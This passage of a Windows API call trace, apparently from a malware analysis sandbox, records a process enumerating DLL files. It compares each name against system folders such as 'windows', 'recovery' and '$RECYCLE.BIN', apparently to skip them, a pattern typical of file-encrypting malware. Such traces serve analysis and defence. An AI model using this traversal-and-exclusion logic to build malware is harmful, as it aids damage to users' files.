lpMultiByteStr="Microsoft.Tools.BinaryStore.dll", lpUsedDefaultChar=0x0) returned 31 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0101.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0101.309] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Tools.Office.C2R.Common.dll", cAlternateFileName="MI509C~1.DLL")) returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2=".") returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="..") returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="...") returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="windows") returned -1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="recovery") returned -1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="perflogs") returned -1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="documents and settings") returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="system volume information") returned -1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Common.dll", lpString2="msocache") returned -1 [0101.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0101.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Common.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Common.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Tools.Office.C2R.Common.dll", lpUsedDefaultChar=0x0) returned 37 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0101.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0101.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Common.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0101.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Common.dll", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Tools.Office.C2R.Common.dll", lpUsedDefaultChar=0x0) returned 37 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0101.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.309] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf483611a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x206c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Microsoft.Tools.Office.C2R.Packager.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2=".") returned 1 [0101.309] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="..") returned 1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="...") returned 1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="windows") returned -1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="recovery") returned -1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="perflogs") returned -1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="documents and settings") returned 1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="system volume information") returned -1 [0101.310] lstrcmpiW (lpString1="Microsoft.Tools.Office.C2R.Packager.dll", lpString2="msocache") returned -1 [0101.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0101.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Packager.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0101.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Packager.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Tools.Office.C2R.Packager.dll", lpUsedDefaultChar=0x0) returned 39 [0101.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0101.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0101.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Packager.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0101.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Tools.Office.C2R.Packager.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Tools.Office.C2R.Packager.dll", lpUsedDefaultChar=0x0) returned 39 [0101.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0101.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0101.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0101.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0101.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0101.310] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b5bbeb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b5bbeb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6f2b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2=".") returned 1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="..") returned 1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="...") returned 1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="windows") returned -1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="recovery") returned -1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="perflogs") returned -1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="documents and settings") returned 1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="system volume information") returned -1 [0101.310] lstrcmpiW (lpString1="msvcp120.dll", lpString2="msocache") returned 1 [0101.310] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.310] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0101.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0101.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0101.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0101.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0101.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0101.311] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa2cf9c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6b538, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2=".") returned 1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="..") returned 1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="...") returned 1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="windows") returned -1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="recovery") returned -1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="perflogs") returned -1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="documents and settings") returned 1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="system volume information") returned -1 [0101.311] lstrcmpiW (lpString1="msvcp140.dll", lpString2="msocache") returned 1 [0101.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0101.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0101.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0101.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp140.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp140.dll", lpUsedDefaultChar=0x0) returned 12 [0101.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0101.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0101.311] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf44c8b33, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf44c8b33, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xec8b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0101.311] lstrcmpiW (lpString1="msvcr120.dll", lpString2=".") returned 1 [0101.311] lstrcmpiW (lpString1="msvcr120.dll", lpString2="..") returned 1 [0101.311] lstrcmpiW (lpString1="msvcr120.dll", lpString2="...") returned 1 [0101.312] lstrcmpiW (lpString1="msvcr120.dll", lpString2="windows") returned -1 [0101.312] lstrcmpiW (lpString1="msvcr120.dll", lpString2="recovery") returned -1 [0101.312] lstrcmpiW (lpString1="msvcr120.dll", lpString2="perflogs") returned -1 [0101.312] lstrcmpiW (lpString1="msvcr120.dll", lpString2="documents and settings") returned 1 [0101.312] lstrcmpiW (lpString1="msvcr120.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.312] lstrcmpiW (lpString1="msvcr120.dll", lpString2="system volume information") returned -1 [0101.312] lstrcmpiW (lpString1="msvcr120.dll", lpString2="msocache") returned 1 [0101.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0101.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0101.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0101.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0101.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcr120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcr120.dll", lpUsedDefaultChar=0x0) returned 12 [0101.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0101.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0101.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0101.312] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e310c7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e310c7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9e572fe, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xdbcc0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2=".") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="..") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="...") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="windows") returned -1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="recovery") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="perflogs") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="documents and settings") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="system volume information") returned 1 [0101.312] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="msocache") returned 1 [0101.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0101.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0101.312] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0101.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0101.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0101.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0101.313] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80d6078, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80d6078, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80d6078, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x412b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2=".") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="..") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="...") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="windows") returned -1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="recovery") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="perflogs") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="documents and settings") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="system volume information") returned 1 [0101.313] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="msocache") returned 1 [0101.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0101.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0101.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0101.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0101.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0101.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0101.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0101.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0101.313] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6223b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6223b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14d50, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2=".") returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="..") returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="...") returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="windows") returned -1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="recovery") returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="perflogs") returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="documents and settings") returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="$RECYCLE.BIN") returned 1 [0101.313] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="system volume information") returned 1 [0101.314] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="msocache") returned 1 [0101.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0101.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.314] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0101.314] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x2412b8, cbMultiByte=16, 